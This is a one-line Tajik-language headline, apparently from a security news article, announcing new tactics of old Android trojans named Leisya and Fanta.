Leisya, Fanta: тактикаи нави трояни кӯҳнаи Android